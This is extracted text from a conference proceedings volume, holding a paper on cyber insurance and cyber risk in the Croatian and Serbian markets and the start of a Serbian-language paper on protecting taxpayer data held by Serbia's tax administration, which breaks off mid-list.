− BACKGROUNDER | NO. 2785 March 28, 2013

− Council of Europe, “Action Against Economic Crime,” http://www.coe.int/t/DGHL/cooperation/economiccrime/cybercrime/default_en.asp

− The Open Group Trusted Technology Forum, “Open Trusted Technology Provider Framework: Industry Best Practices for Manufacturing Technology Products that Facilitate Customer Technology Acquisition Risk Management Practices and Options for Promoting Industry Adoption,” February 2011,

− John D. Villasenor, “Ensuring Hardware Cybersecurity,” Issues in Technology Innovation, No. 9 (May 2011)

− Internet Corporation for Assigned Names and Numbers, http://www.icann.org/en/groups, and Internet Society, http://www.internetsociety.org/

− Information Technology Industry Council, “ITI Recommendation: Addressing Liability Concerns Impeding More Effective Cybersecurity Information Sharing,” January 2012, http://www.itic.org/dotAsset/fae2feab-7b0e-45f4-9e74-64e4c9ece132.pdf

− Rosenzweig, Cyber Warfare

− Bellamy, C., & Taylor, A. J. (1998). Governing in the information age. Buckingham: Open Univ. Press.

− Brown, M. M., & Brudney, J. L. (2001, October). Achieving advanced electronic government services: An examination of obstacles and implications from an international perspective.

− Cohen, S., & Eimicke, W. (2001). The use of Internet in government service delivery. In M. Abramson & G. E. Oxford: Rowman & Littlefield Publishers, Inc.

− Danziger, J. N. (2004). Innovation in innovation: The technology enactment framework. Social Science Computer

− Garson, G. D. Information systems, politics, and government: Leading theoretical perspectives. In G. D.

35

THE ROLE OF CYBER UNSURANCE IN MANAGING AND MITIGATING

CYBER SECURITY RISK

WITH SPECIAL EMPHASIS ON THE POTENTIAL OF CROATIA AND SERBIA CYBER INSURANCE MARKET

MBA, Danijel Bara5 mr.sc., Sanja Ćorić6

dipl.oecc, Goran Jurišić7

Abstract: This article explores the impact that cybercrime has on businesses, with a focus on small and large businesses, as well as proactive measures that can mitigate the risks of cyber threats and specifically deals with cyber risk insurance as an extra tool to transfer risk. I argue that companies need to adopt a proactive strategy for managing cyber-attacks to protect their infrastructure and ensure its viability in the market. If this is achieved, cyber insurance can be a part of the overall business strategy for risk reduction.

Key words: Cyber insurance, cyber security, cyber insurance market

PREFACE

In today’s highly informatics and electronic dependency age, corporations are becoming more and more exposed to various types of cyber-attacks. Fraudulent and other cybercrime events like cyber espionage, cyber warfare , cyber terror, cyber bullying caused by both internal or external breaches, have devastating consequences and great impact on companies, their employees, customers and third parties. Such actions may lead to intellectual property theft, compromising corporate strategy, pilfering or manipulating confidential and regulated data and could even threaten a company’s very existence. As cybercrime events have increasingly impacted organizations, cyber security has transformed from just a problem of companies IT department but rather one of strategic risk where the executive management must take ownership. In its Global Risks Report for 2011, the World Economic Forum (WEF)

5 Jadransko osiguranje Ltd, Listopadska 2, Zagreb, Hrvatska, [email protected] 6 Jadransko osiguranje Ltd, Listopadska 2, Zagreb, Hrvatska, [email protected] 7 Jadransko osiguranje d.d., Listopadska 2, Zagreb, Hrvatska, [email protected]

The role of cyber unsurance in managing and mitigating cyber security risk

Zbornik radova Danijel Bara; Sanja Ćorić; Goran Jurišič

36

reported that concerns about cyber-security were one of the top five global risks along-side demographic challenges and weapons of mass destruction identified by senior executives and decision-makers [1].

CYBER-INCIDENTS AND THEIR IMPACTS

There are three main compelling motivational factors behind the rising tide of cybercrime: first, it is anonymous; second, there is a low risk of getting caught; and third, there can be big rewards. Drive-by exploits, worms, code injections, exploit kits and botnets are all rising in prominence. It is now perfectly possible to buy toolkits from the darknet8 that enable criminals to commit fraud, some of which can even be purchased with IT support. They are not expensive and are commonly available. Obviously these are not purchased using traditional methods of payment which is one of the reasons behind the rise of alternative forms of commerce such as Bitcoin9. There is a growing interest in the darknet, such as Tor (The Onion Router), where is virtually impossible to trace users [4].

In 2011 cyber-attacks on Sony involved the theft of personal data that include names, passwords and addresses from more than 100 million accounts on its PlayStation Network and Sony Online Entertainment services [5]. Expected cleanup costs reached 171 mil $ [6], but the full costs of data breach could reach billions of dollars [7]. Despite having cyber liability coverage through CGL (Commercial General Liability) policy at Zurich American Insurance Company, Sony did not received compensation for the damages caused by the breach. The CGL policy covered actions taken by Sony. Since the breach was caused by third-party hackers, therefore Zurich American was not obliged to reimburse Sony. The judgment is pronounced as acts done by a third party hackers which do not constitute oral or written publication in any manner of the material that violates a person’s right of privacy in the Coverage B (personal and advertising injury coverage) under the CGL policy issued by Zurich [8].

In December 19, 2013, Target Corporation announced a data breach resulting from a cyber-attack on its systems. The breach affected two types of data: payment card data, which affected approximately 40 million Target customers, and certain personal data, which affected up to 70 million Target customers [9], [10]. To date, Target has reported data breach costs of $248 million. Independent sources have made back-of-the-envelope esti- mates ranging from $240 million to $2.2 billion in fraudulent charges alone. This does not include additional potential costs to consumers concerned about their personal information or credit histories; potential fines or penalties to Target, financial institutions, or others; or any costs to Target related to a loss of consumer confidence. The breach was among the largest in U.S. history [11].

8 Darknet is private network where connections are made only between trusted peers using non-standard protocols and ports. These include what others might term the ‘deep web’, consisting of unindexed web pages that you can find only by knowing about them [2]. 9 Bitcoin is an innovative payment network and a new kind of money. Bitcoin uses peer-to-peer technology to operate with no central authority or banks; managing transactions and the issuing of bitcoins is carried out collectively by the network. Bitcoin is open-source; its design is public, nobody owns or controls Bitcoin and everyone can take part. Through many of its unique properties, Bitcoin allows exciting uses that could not be covered by any previous payment system [3].



37

In 2014 Sony suffered another powerful cyber-attack. Attackers released confidential data belonging to Sony Pictures Entertainment. The data included personal information about Sony employees and their families, e-mails between employees and customers, information about executive salaries at the company, copies of unreleased Sony films, and other information. Major costs for the attack by unidentified hackers include the investigation into what happened, computer repair or replacement, and steps to prevent a future attack. Lost produ- ctivity while operations were disrupted will add to the price tag. The attack, believed to be the worst of its type on a company on U.S. soil, also hits Sony's reputation for a perceived failure to safeguard information, with estimated costs for Sony could stretch to $100 million [12]. As revealed in the Ponemon Institute 2014 Cost of Data Breach Study: Global Analysis, sponsored by IBM, the average cost of data breach to a company was $3.5 million in US dollars and 15 percent more than what it cost the year before [13].

Business giants are not the only ones vulnerable to devastating cyber-attacks. It is the data that makes a business attractive, not the size – especially if it is delicious data, such as lots of customer contact info, credit card data, health data, or valuable intellectual property [14]. Smaller companies are attractive because they don’t have same resources as bigger companies thus tend to have weaker cyber security strategy. Because of low sales costs they are doing more business online and via different cloud services. Those services are using weak security protection and weak encryption technology so they are more vulnerable to wide range cyber-attacks. The Verizon Communications 2013 Data Breach Investigations Report found that close to 62% of data breaches that year were at the SME (Small and Medium-sized Enterprises). Among the weaknesses that make SMEs attractive to criminals, cited by multiple experts are [15]:

− Lack of time, budget and expertise to implement comprehensive security defenses. − No dedicated IT security specialist on the payroll. − Lack of risk awareness. − Lack of employee training. − Failure to keep security defenses updated. − Outsourcing security to unqualified contractors or system administrators − Failure to secure endpoints.

Besides that, in todays interconnected world small businesses are involved in more complex networks, mobile connections and clouds with their customers and partners. If small company in its portfolio has big companies as partner or customer, than they are very attractive targets allowing to enter at more lucrative market through the back door.

CYBER THREATS IN CROATIA AND SERBIA

In view of this, the logical conclusion is that companies operating in Croatia and Serbia are also not immune to cybercrime. Most companies operating in these areas according to US standards falls within the SME segment, although for its size in the mother countries belong to large companies. In Croatia, in the earlier years were sporadic incidents of cyber-attacks, but joining the EU according to publicly published data about shown incidents, this number has increased dramatically, and the attacks have become a larger on scale and more systematic.



38

In 2014, after six months of frequent cyber-attacks on users of internet banking in Croatia, Head of Office of Public Relations CNB (Croatian National Bank) said that according to available data, really ultimately alienated and paid was less than six percent of the potentially unauthorized default transactions, totaling almost 1.8 million [16]. In mid-March 2015, Croatia has been again the target of intense cyber-attacks. The attacks came via multiple vectors of which one relates to the e-mail message, and the second one to online banking. What is problematic in these attacks is that it occurs via an exploit that is served through the promotion via the largest Croatian providers of internet promotion [17].

In Serbia, there is lack of official data on the dimension of cyber-attacks. In Serbia it was observed a greater number of cybercrime attacks annually and that need greater engagement of all social institutions and the media in the prevention of these crimes [18].

Cyber security experts expect cyber security threats to continue in 2015, with innovative attacks. Cybercrime is profitable and the risks for the criminals to be caught or punished are still negligible. 2015 is likely to see more copycat crimes as well as increased sophistication in attacks [19]. In a recent study, 52% of directors ranked IT strategy and risk as the issue for which they need better information and processes – behind only strategic planning [20].

CYBER RISK

Security breaches can be categorized by a triad of confidentiality, availability and integrity, as shown in Figure 1 [21].

Figure 1: Security triad

Source: EY, 2015.

The potential losses deriving from cyber-attacks or non-malicious IT failures fall into the following 11 categories as shown in Figure 2 [22].

Preventing the disclosure of information to unauthorized individuals or systems

Maintaining and assuring the accuracy and consistency of systems and data Making sure that the

computing systems, the security controls, and the communication channels are functioning correctly

Security model



39

Figure 2: Loss categories deriving from cyber-attacks and non-malicious IT failures

LOSS CATEGORY DESCRIPTION

A A Intellectual property (IP) theft

Loss of value of an IP asset, expressed in terms of loss of revenue as a result of reduced market share.

B Business interruption Lost profits or extra expenses incurred due to the unavailability of IT systems or data as a result of cyber-attacks or other non-malicious IT failures.

C Data and software loss The cost to reconstitute data or software that has been deleted or corrupted.

D Cyber extortion The cost of expert handling for an extortion incident, combined with the amount of the ransom payment.

E Cybercrime/cyber fraud The direct financial loss suffered by an organization arising from the use of computers to commit fraud or theft of money, securities, or other property.

F Breach of privacy event

The cost to investigate and respond to a privacy breach event, including IT forensics and notifying affected data subjects. Third-party liability claims arising from the same incident. Fines from regulators and industry associations.

G Network failure liabilities Third-party liabilities arising from certain security events occurring within the organization’s IT network or passing through it in order to attack a third party.

H Impact on reputation Losses of revenues arising from an increase in customer churn or reduced transaction volumes, which can be directly attributed to the publication of a defined security breach event.

I Physical asset damage First-party loss due to the destruction of physical property resulting from cyber-attacks.

J. Death and bodily injury Third-party liability for death and bodily injuries resulting from cyber-attacks.

K Incident investigation and response costs

Direct costs incurred to investigate and “close” the incident and minimize post-incident losses. Applies to all the other categories/events.

Source: Marsh, 2015.

CYBER INSURANCE

The financial implications of a cyber-incident could have significant impact on the company balance sheet – the actual damage caused, the costs of notification, potential fines for losses and damage, and added to all this, the damage to reputation. Additionally firms are potentially opening themselves up to liability if they don’t adequately cater for cyber risks (either by buying insurance or by some other risk mitigation strategy). Should an event occur then stakeholders will be asking why the appropriate insurance and/or risk management strategies were not in place and properly implemented [4].



40

In the wake of numerous recent data breaches, much has been published on cyber liability insurance. Professional liability policies for companies providing computer hardware and software services have grown to include not just technology providers but all those collecting, storing and processing electronic data from their customers. The market for cyber liability insurance has been around for over a decade, but only recently has it experienced a spike in demand. The variety of recent high-profile data breaches have cast light on the importance of having coverage should a cyber-attack strike a business. No business is immune to a cyber-attack, which can wreak havoc not only on the IT environment, but also on the bottom line. Despite all of this, cyber insurance is a product still in its infancy. While there is a wide array of cyber insurance coverage options available, they can be very limited because a standardized assessment of cyber risk does not yet exist. This is where having the right cyber risk intelligence information can help make more informed decisions around organization’s unique cyber risks, the potential impact and where to focus security efforts and budget when it comes to selecting the proper cyber liability insurance [23].

The government in the UK has offered a solution to the problem of standardization of risk assessment with Cyber Essentials scheme. It has been developed by Government and industry to fulfill two functions. It provides a clear statement of the basic controls all organizations should implement to mitigate the risk from common internet based threats, within the context of the Government's 10 Steps to Cyber Security. And through the Assurance Framework it offers a mechanism for organizations to demonstrate to customers, investors, insurers and others that they have taken these essential precautions. Government believes that implementing these measures can significantly reduce an organization's vulnerability. However, it does not offer a silver bullet to remove all the cyber security risk; for example, it is not designed to address more advanced, targeted at tacks and hence organizations facing these threats will need to implement additional measures as part of their security strategy. What Cyber Essentials does to is define a focused set of controls which will provide cost-effective, basic cyber security for organizations of all sizes [24].

An insurance policy cannot reduce the risk but it can act as a valuable risk transfer mechanism that protects the balance sheet from a serious financial shock. Most insurers also provide additional services such as access to forensic IT specialist who can help both pre- and post-loss, and advise on the appropriate policies and procedures to ensure the best information security [4].

While insurance may seem a narrow and non-technical way to approach such a complex and far-reaching threat, it adds a valuable perspective to cyber risk [25] as it is seen in figure 3.

Figure 3: Insurance as a valuable perspective to cyber risk

Perspective reason Description

Premium cost Insurance places a cost on company’s cyber risk through the premium they pay, and the prospect of a reduced premium then encourages firms to take steps to mitigate the risk.

Loss prevention Insurance goes arm-in-arm with loss prevention. Insurers will help firms reduce their losses by providing insight from claims and near misses across their client base.

Knowledge and experience

Insurers bring their knowledge and experience of more established risks that can be applied to cyber.

Source: Surf Watch Cyber in Sight, 2014



41

The picture for SMEs (see Figure 4) shows that for this segment of company’s insurers see a higher incidence of cybercrime. SMEs are also considered to be at a greater risk of data/software damage. This reflects the belief that SMEs are more vulnerable to attack and lack the back-up disaster-recovery solutions of larger firms. On the other hand, with the exception of those working on innovative technologies, most SMEs are considered less likely to suffer from losses connected to damaged reputation or IP theft. At present, within the insurance sector, the cyber threat is not well defined, with confusion surrounding definitions based on different causes and consequences.

Figure 4: Risk profile for SMEs

Source: Marsh, 2015.

The insurance industry underwrites cyber risk by forming a view of the severity and frequency of cyber events. Figure 4 summarizes that view for the different loss categories for SME businesses, noting that one event can trigger more than one loss category. Furthermore, in almost all cyber events, the company incurs incident investigation and response costs, which can account for around 10% -20% of the cost of a cyber-security breach for a large business [22].

Insurance companies in the Croatian and Serbian insurance market, in its portfolio of services, do not offer special cyber insurance products, although it is evident that there is a need for this form of insurance. Therefore, companies in these two countries should devote maximum proactive approach to problem solving cyber security, and if it is not itself able to do, seek the help of specialized companies for security. Croatian experts in security and forensics are among the best in Europe [16], and their knowledge is necessary to use in order to maximize protection against cyber threats. In addition, hiring security professionals and their firms when developing safety profile of the company which is necessary insurance, would certainly speed up the now poor cyber insurance market in Croatia and Serbia. Examples of such partnerships between the companies for security and insurance companies already exist and thus facilitated the transfer of risk. Cyber insurance is not a substitute for establishing and maintaining a secure environment. However, cyber insurance is perhaps what is needed to avoid or reduce the impact of the attack, and give you compensation in case of loss.



42

CONCLUSION

In order to reduce corporate risk, today's modern business requires from companies a proactive approach to the problem of cyber security. This consequently means proportionately greater investment in the very security infrastructure, and increases their chances of detecting potential threats. At the same time, it is desirable that the company analyzes the currently valid insurance policy, their coverage and to make an assessment of exposure to cyber risk. Finally, managers should decide whether to invest in some form of cyber security. By increasing the level of corporate security, together with additional protection in the form of cyber insurance policy, the company will raise their level of competitiveness and become attractive to investors.

Croatian and Serbian insurance market is underdeveloped in terms of cyber insurance, and in this segment lays great potential for development. To meet the needs of its customers to reduce losses due to cyber-attacks, insurance companies in Croatia and Serbia will have to follow the example of the developed insurance markets and to offer cyber insurance services. Maybe it is absolutely necessary to minimize the risks of cyber threats and minimize losses.



43

LITERATURE

[1] Global Risks 2011 Sixth Edition, An Initiative of the Risk Response Network (2011) , World Economic Forum in collaboration with Marsh & McLennan Companies, Swiss Reinsurance Company, Wharton Center for Risk Management, University of Pennsylvania, Zurich Financial Services, January 2011, available ar http://reports.weforum.org/global-risks-2011/, Retrieved (06-04-2015)

[2] Mansfield-Devine, S., (2009). Darknets. Computer Fraud & Security 2009 (12), pp. 4–6. https://bitcoin.org/en/, Retrieved (08-04-2015)

[3] Pearson, N. (2014), A larger problem: financial and reputational risks, Computer Fraud & Security, pp. 12-13

[4] Sony battles to regain trust after data breach (2011), The Independent, available at http://www.independent.co.uk/life-style/sony-battles-to-regain-trust-after-data-breach-2283560.html, Retrieved (070-04-2015)

[5] Schwartz, M.J. (2011) Sony Data Breach Cleanup To Cost $171 Million, Information Week Dark Reading, available at http://www.darkreading.com/attacks-and-breaches/sony-data-breach-cleanup-to-cost-$171-million/d/d-id/1097898?, Retrieved (07-04-2015)

[6] Takashi, D. (2011), The cost of Sony’s PlayStation Network outage: $24 billion or $20 million?, Venture Beat, available at http://venturebeat.com/2011/04/27/the-cost-of-sonys-playstation-network-outage-24-billion-or-20-million/, Retrieved (07-04-2015)

[7] Young, H. (2014), N.Y. Court: Zurich Not Obligated to Defend Sony Units in Data Breach Litigation, Insurance Journal, available at http://www.insurancejournal.com/news/east/2014/03/17/323551.htm, Retrieved (070-04-2015)

[8] Target Press (2013), Target Confirms Unauthorized Access to Payment Card Data in U.S. Stores, Minneapolis, December 13, 2013, available at http://pressroom.target.com/news/target-confirms-unauthorized-access-to-payment-card-data-in-u-s-stores, Retrieved (07-04-2015)

[9] Mulligan, J. (2014), Hearing On Protecting Personal Consumer Information From Cyber Attacks And Data Breaches, Testimony of John Mulligan, Executive Vice President And Chief Financial Officer of Target, Before The Senate Committee on Commerce, Science, & Transportation, March 26,2014, available at https://corporate.target.com/_media/TargetCorp/global/PDF/Target-SJC-032614.pdf, Retrieved (07-04-2015)

[10] Weiss, N.E., Miller, R.S., (2015), The Target and Other Financial Data Breaches: Frequently Asked Questions, Congressional Research Service, Prepared for Members and Committees of Congress February 4, 2015.

[11] Richwine, L. (2014): Cyber attack could cost Sony studio as much as $100 million, Reuters, available at http://www.reuters.com/article/2014/12/09/us-sony-cybersecurity-costs-idUSKBN0- JN2L020141209, Retrieved (07-04-2015)

[12] 2014 Cost of Data Breach Study: Global Analysis (2014), Benchmark research sponsored by IBM Independently conducted by Ponemon Institute LLC May 2014, Ponemon Institute© Research Report, available at http://www.ponemon.org/blog/ponemon-institute-releases-2014-cost-of-data--breach-global-analysis, Retrieved (07-04-2015)

[13] Armerding, T. (2015), Why criminals pick on small business, available at http://www.csoonline.com/article/2866911/cyber-attacks-espionage/why-criminals-pick-on-small-business.html, Retreived (07-04-2015)



44

[14] 2013 Data Breach Investigation Report (2013), A global study conducted by the Verizon RISK team with cooperation from: number of companies, available at http://www.verizonenterprise.com/resources/reports/rp_data-breach-investigations-report-2013_en_xg.pdf, Retrieved (07-04-2015)

[15] Ivezić, B., (2014), HNB: Sumnja se da su cyber kriminalci Hrvatima ukrali 1,8 milijuna kuna, Poslovni dnevnik, available at http://www.poslovni.hr/tehnologija/manje-napada-cyber-kriminalaca-ali-opasnost-i-dalje-postoji-274466, Retrieved (08-04-2015)

[16] Portal Svijet sigurnosti, (2015), U posljednja 72 sata Hrvatska je meta intenzivnih hakerskih napada, available at http://www.svijetsigurnosti.com/blogs/5433-u-posljednja-72-sata-hrvatska-je-meta-intenzivnih-hakerskih-napada, Retrieved (08-04-2015)

[17] Kurir (2015), Ministar Stefanović: U porastu broj sajber napada, available at http://www.kurir.rs/vesti/drustvo/ministar-stefanovic-u-porastu-broj-sajber-napada-clanak-1706525, Retrieved (08-04-2015)

[18] Schrader, C. (2015), 2015 Small Business Cyber Security Threats, National Cybersecurity Institute at Excelsior College, Washington D.C., available at http://www.nationalcybersecurityinstitute.org/2015-small-business-cyber-security-threats/, Retrieved (08-04-2015)

[19] Boardmember.com (2014), Research: Law in the Boardroom in 2014, available at http://www.fticonsulting.com/global2/media/collateral/united-states/law-in-the-boardroom-in-2014.pdf, Retrieved (08-04-2015)

[20] Crawford., S., Piesse, D. (2014), Cyber insurance, security and data integrity Part 1: Insights into cyber security and risk — 2014, Ernst & Young LLP

[21] UK Cyber Security: The Role of Insurance in Managing and Mitigating the Risk (2015), HM Government, Marsh Ltd

[22] Using Cyber Insurance and Cybercrime Data to Limit Your Business Risk (2014.), Surf Watch Cyber in Sight, available at http://research.publicsectorexecutive.com/content43988, Retrieved (06-04-2015)

[23] Cyber Essentials Scheme Summary (2014), HM Government, Department for Business, Innovation and Skills and cabinet Office

[24] Information Security Breaches Survey 2014 | technical report (2014), The Department for Business, Innovation and Skills , conducted by PwC, in association with Infosecurity Europe & Reed Exhibitions, HM Government

45

NEOPHODNOST ZAŠTITE PODATAKA KOJIMA RASPOLAŽU PORESKE ADMINISTRACIJE

Necessity to Protect Data Held by the Tax Administration

Zoran Vasić, PhD, main tax advisеr

Sadržaj: Kao ni u jednom drugom poslu ne postoji mesto na kome se nalazi toliki broj informacija o svakom poreskom obvezniku kao što je to u poreskoj administraciji. S obzirom na dislociranost organizacionih jedinica poreske uprave, ITK mreža predstavlja visoko distribuirani tehnički sistem. Svi podaci kojima raspolaže poreska administracija Srbije smešteni su u baze podataka i predstavljaju informatičku i stručnu podršku zaposlenima u obavljanju njihovih svakodnevnih aktivnosti. Intranet je zaštićen barijerom – firewall-om od neželjenih pristupa zaštićenim podacima uprave. U datotekama poreske administracije nalaze se dosijei poreskih obveznika. Otkrivanjem podataka iz dosijea poreskih obveznika može im biti naneta šteta. Prelaskom na nove tehnologije vođenja knjigovodstva i podnošenja elektronskih prijava poreskoj upravi načinjen je značajan korak u ovom pravcu. Međutim, veća dostupnost informacijama o poreskim obveznicima nosi uvećanu opasnost zloupotrebe. Veliki broj podataka, dva operativna sistema koja uporedo funkcionišu, mogućnost pristupa informacijama i njihoj promeni, slaba informatička pismenost zaposlenih i nedovoljna kontrola lica koja pristupaju informacijama i menjaju ih može rezultirati štetama po budžet i poreskim obveznicima. Sistem zaštite bi trebalo da bude takav da ne omogućava zloupotrebu pristupu informacijama. Sistem bi trebalo da deluje preventivno, a ne kada je do štete već došlo. Sve razmene podataka između centrale i filijala obavljaju se bez šifrovanja upotrebom HTTP i FTP servisa. Određena zaštita se sprovodi tako što se prenos podataka vrši u unapred definisanim periodima i u mogućnosti da se izda neka naredba serveru u filijali, npr. naredba za formiranje backup-a. Mogućnost izmene i brisanja podataka ustanovljava se sistemom privilegija koja omogućavaju definisanje kontrole pristupa podacima sa naredbom: select, insert, update ili delate.

Slabost DIS 2003 je nepostojanje i/ili nesprovođenje sigurnosne politike, kao što je npr. loša primena sistema autentifikacije korisnika. Ovaj propust bitno umanjuje mogućnost odbrane od unutrašnjih pretnji.

Ključne reči: Poreska uprava, podaci, zaštita

Abstract: As in any of the other professions,there is no place where there is a lot of information about each taxpayer as it is in the Tax Administration.Due to the dislocation of organizational units of the Tax Administration, ITC network is a highly distributed technical system.All data available to the Tax Administration of Serbia are located in the database and represent informatical and professional support for the stuff in performing their daily activities.Intranet is protected by a barrier-a firewall against unwanted access to the protected

Neophodnost zaštite podataka kojima raspolažu poreske administracije

Zbornik radova Zoran Vasić

46

data management. In the files of the Tax Administration there are records of taxpayers.Disclosure of information from the files of taxpayers may cause damage.By switching to the new tecnology of book keeping and filing electronical applications the Tax Administration made a significant step in direction of data protection.However,the greater availability of information on taxpayers carries increased risk of abuse.A large number of data,two ope- rationg systems working in parallel,access to information and their change,poor literacy of the stuff and insufficient control of persons who access and may change information may result in damage to the budget and tax payers. Protection system shold be such that prevents misuse of the access to information.the system should act preventively,not when the damage has already occured.All data exchange between headquarters and branches is performed without encryption using HTTP and FTP services.Certain protection is implemented so that data transfer is performed in the predefined periods and for example, is able to issue a command to the server in the branch office for forming the backup files.The possibility of changes and data deletions is established with a system of privileges that allow defining access control with the commands:select,insert,update, delete.Weakness of DIS2003 is the lack of and/or failure to implement security policies, such as poor application of the system to authenticate users. This failure significantly reduces the possibility of defense against internal threats.

Key words: Tax Administration, data, protection



47

U V O D

Kao ni u jednom drugom poslu ne postoji mesto na kome se nalazi toliki broj informacija o svakom poreskom obvezniku kao što je to u poreskoj administraciji. U Srbiji skoro svako punoletno lice je poreski obveznik, po nekom poreskom osnovu (porez na dohodak građana, porezi na imovinu, porez na držanje, nošenje i korišćenje i dr.). Po osnovu obavljanja delatnosti ima oko 330.000 poreskih obveznika. S obzirom na način organizovanja poreske administracije u različitim zemljama te informacije su dostupnije ili nešto manje dostupne, odnosno do njih se može doći uz nešto manje ili nešto više napora. U zemljama u kojima je poreska administracija uređena centralizovano sve informacije se nalaze u jednom sistemu. U zemljama kod kojih je poreska administracija uređena decentralizovano, podaci o privrednim i fizičkim subjektima, odnosno pravnim i fizičkim licima nisu dostupni u jednom sistemu. Uređenost carinskog i poreskog poslovanja i njihovo organizovanje u jednom ili dva organa državne uprave, kao i u slučaju centralizovanog i decentralizovanog sistema uređe- nosti poreskog poslovanja rezultira pristupačnošću informacijama o subjektima koji su u postupcima rada ovih organa na jednom, odnosno dva ili više mesta. Organizovanost poreskog i carinskog poslovanja u Republici Srbiji je u okviru dva organa državne uprave u sastavu ministarstva finansija i to kao Poreske uprave i Uprave carina. Sa stanovišta organizovanja poreskog poslovanja započeta fiskalna decentralizacija u 2007. godini, zadržala se samo na oporezivanju imovine i to onom delu zakona o porezima na imovinu koji se odnosi na imovinu koja odslikava ekonomsku moć nosioca prava svojine, ili korisnika nepokretnosti, odnosno imovine u statici. Svi ostali poreski oblici administriraju se od jednog centralno organi- zovanog organa na republičkom nivou, Poreske uprave Republike Srbije. ITK mreža predstavlja visoko distribuirani tehnički sistem, s obzirom na dislociranost organizacionih jedinica poreske uprave, pa je stoga metodologija upravljanja i održavanja veoma kompleksna.

1. PODACI KOJIMA RASPOLAŽU PORESKE ADMINISTRACIJE

Svi podaci kojima raspolaže poreska administracija Srbije smešteni su u baze podataka i to u: relacione i nerelacione. Svi podaci u relacionim bazama smešteni su u tabelama.

Poreske administracije raspolažu velikim brojem raznovrsnih informacija koje se ne odnose samo na informacije o materijalnim i ljudskim resursima poreske administracije, već što je mnogo značajnije, informacijama koje se odnose na pravna lica, preduzetnike i fizička lica koja su poreski obveznici, drugi poreski dužnici, ili su u nekom prethodnom periodu bili u tom statusu. Sve one su dostupne na intranetu i ekstranetu. Na intranetu su informacije koje koriste zaposleni u poreskoj administraciji. Poreska administracija je u posedu sledećih informacija vezanih za realizaciju aktivnosti iz nadležnosti Poreske uprave :

− Poresko upravna akta doneta u poreskom i poreskoprekršajnom postupku sa svim spisima predmeta po kojima je postupano;



48

− Мišljenja Ministarstva finansija, koja se objavljuju u “Biltenu službenih obja- šnjenja i stručnih mišljenja”;

− Podaci o ostvarenim poreskim prihodima koji se objavljuju u “Biltenu javnih finansija”;

− Sudske odluke; − Saopštenja Poreske uprave koja se u elektronskoj formi mogu preuzeti na adresi

www.purs.gov.rs; − Izveštaji o radu Poreske uprave; − Poreski propisi, podzakonska akta, obrasci poreskih prijava; − Korisnička uputstva za primenu propisa. Servisi na intranetu su u ovom trenutku brojniji i predstavljaju informatičku i

stručnu podršku zaposlenima u obavljanju njihovih svakodnevnih aktivnosti. Njihova upotreba omogućava lakši prenos i čuvanje dokumenata. Server skladišti podatke i snabdeva zaposlene potrebnim informacijama. Intranet je zaštićen barijerom – firewall-om od neželje- nih pristupa zaštićenim podacima uprave.

Spoljni korisnici

Slika 1. - Arhitektura intraneta poreske uprave

Elektronska pošta omogućava komunikaciju zaposlenih unutar organizacije i razmenu poruka sa spoljnim okruženjem. WWW omogućava komunikaciju unutar uprave.

Poreska uprava ima potrebu da razmenjuje podatke sa više eksternih sistema bilo da tim sistemima šalje podatke bilo da ih od njih prima. Ti sistemi su: Narodna banka Srbije, MUP Srbije, Uprava carine, Uprava za trezor, Fond PIO, Zavod za statistiku, Agencija za privredne registre, Centralni registar hartija od vrednosti i drugi. Najznačajniji uticaj na poslovne procese poreske uprave ima prijem podataka iz Narodne banke Srbije – Uprava za trezor o izvršenim uplatama na račun javnih prihoda. Veliki broj netačnih podataka odlaže proces knjiženja čime otežava proces naplate i onemogućava dostavljanje tačnih izveštaja o stanju na računima obveznika i računima javnih prihoda. Podaci o fizičkim licima i vla- snicima oružja preuzimaju se iz baze MUP na CD. Baze sadrže neispravne i netačne zapise što komplikuje rad poreske uprave.

Firewall serveri

Intranet

e-mail server

Web server

Baze podataka



49

1.1. Materijalni resursi

U bazi podataka nalaze se podaci o prihodima i rashodima. Sredstva za rad poreske uprave obezbeđuju se u budžetu Republike. Materijalni troškovi dati su u strukturi posedovanja zemljišta, zgrada i drugih građevinskih objekata, mašina i opreme kao i u nematerijalnoj imovini. Zemljište je dato u strukturi kao poljoprivredno, šumsko i građevinsko. Zgrade su date kao službene zgrade, delovi zgrada – kancelarije i poslovni prostor, poslovne zgrade i stambene zgrade. Pregled o stanju pokretnih stvari dat je po vrstama i to: sredstva opreme, računarski sistemi, sredstva veza, kancelarijski nameštaj, birotehnička oprema, prevozna sredstva - putnički automobili i druge vrste vozila. Njih čine zarade i naknade za stručno obra- zovanje, osposobljavanje i usavršavanje zaposlenih, njihovo stimulativno nagrađivanje, tro- škovi putovanja, usluge po ugovoru, tekuće popravke i održavanje, specijalizovane usluge, materijal, kamate, dotacije međunarodnim organizacijama, porezi, takse, kazne, potrebna stru- čna literatura i kancelarijski materijal. Sve nabrojano se vodi po organizacionim jedinicima.

1.2. Ljudski resursi

Podaci o zaposlenima arhivirani su u Sektoru za ljudske resurse. Na osnovu njih se mogu utvrditi podaci o ukupnom broju zaposlenih, zaposlenih na položaju, državnih slu- žbenika i nameštenika, prema zvanjima na osnovu kojih su raspoređeni na radna mesta, kvali- fikacionoj, polnoj i starosnoj strukturi, osnovnim zaradama i primanjima po drugim osnovama, kao što su dodatni koeficjenti, nagrade, naknade po raznim osnovama i dr. O svakom zaposlenom na intranetu su dostupne informacije na kom radnom mestu i u kojoj organi- zacionoj jedinici je raspoređen, njegov broj telefona i elektronska adresa.

1.3.Poreski obveznici

U datotekama poreske administracije nalaze se dosijei poreskih obveznika. Oni su skup dokumenata i informacija o poreskim obveznicima. Sistematizovani su u zavisnosti od značaja i vrste podataka koje sadrže u dosijea opšteg, posebnog i specijalnog karaktera. Osnovni i posebni dosijei sadrže podatke o poslovnom statusu, dok specijalni dosijei sadrže posebne informacije o poreskom obvezniku. I dok su podaci o poreskom obvezniku koji se nalaze u opštem i posebnom dosijeu opšteg karaktera i za koje ne postoji potreba za posebnom zaštitom, to su podaci koji se nalaze u specijalnom dosijeu takve prirode da njihovim otkrivanjem može biti naneta šteta poreskom obvezniku. U specijalnom dosijeu se nalaze:

− Zapisnici i dopune, odnosno dopunski zapisnici o izvršenoj kancelarijskoj i tere- nskoj kontroli;

− Rešenja doneta na osnovu zapisnika, dopune i dopunskih zapisnika; − Žalbe izjavljene protiv prvostepenih rešenja; − Drugostepena rešenja doneta povodom izjavljenih žalbi; − Rešenja kancelarijske i terenske kontrole doneta u ponovnom postupku; − Presude Upravnog suda donete u upravnom sporu povodom tužbe poreskog

obveznika podnete protiv drugostepenog rešenja; − Zahtevi za pokretanje prekršajnog postupka podneti od kancelarijske i terenske

